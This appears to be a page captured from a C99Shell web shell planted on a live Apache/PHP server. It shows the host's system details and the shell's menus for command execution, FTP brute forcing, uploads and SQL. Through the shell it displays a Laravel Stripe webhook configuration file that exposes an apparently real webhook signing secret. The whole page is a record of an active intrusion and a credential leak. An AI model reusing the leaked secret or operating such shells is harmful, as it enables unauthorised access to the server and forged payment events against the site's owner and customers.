!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/config/   drwxr-xr-x
Free 29.36 GB of 117.98 GB (24.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     stripe-webhooks.php (2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

use App\Jobs\StripeWebhooks\InvoicePaymentSucceededJob;

// use App\Jobs\StripeWebhooks\ChargeSucceededJob;

return [
    
/*
     * Stripe will sign each webhook using a secret. You can find the used secret at the
     * webhook configuration settings: https://dashboard.stripe.com/account/webhooks.
     */
    
'signing_secret' => 'whsec_zH3RykA7qTcP8tWuSmxSl9lTHLzQHyTV',

    
/*
     * You can define a default job that should be run for all other Stripe event type
     * without a job defined in next configuration.
     * You may leave it empty to store the job in database but without processing it.
     */
    
'default_job' => '',

    
/*
     * You can define the job that should be run when a certain webhook hits your application
     * here. The key is the name of the Stripe event type with the `.` replaced by a `_`.
     *
     * You can find a list of Stripe webhook types here:
     * https://stripe.com/docs/api#event_types.
     */
    
'jobs' => [
        
// 'source_chargeable' => \App\Jobs\StripeWebhooks\HandleChargeableSource::class,
        // 'charge_failed' => \App\Jobs\StripeWebhooks\HandleFailedCharge::class,
        // 'charge_succeeded' => ChargeSucceededJob::class,
        
'invoice_payment_succeeded' => InvoicePaymentSucceededJob::class,

    ],

    
/*
     * The classname of the model to be used. The class should equal or extend
     * Spatie\WebhookClient\Models\WebhookCall.
     */
    
'model' => \Spatie\WebhookClient\Models\WebhookCall::class,

    
/**
     * This class determines if the webhook call should be stored and processed.
     */
    
'profile' => \Spatie\StripeWebhooks\StripeWebhookProfile::class,

    
/*
     * Specify a connection and or a queue to process the webhooks
     */
    
'connection' => env('STRIPE_WEBHOOK_CONNECTION'),
    
'queue' => env('STRIPE_WEBHOOK_QUEUE'),

    
/*
     * When disabled, the package will not verify if the signature is valid.
     * This can be handy in local environments.
     */
    
'verify_signature' => env('STRIPE_SIGNATURE_VERIFY'true),
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--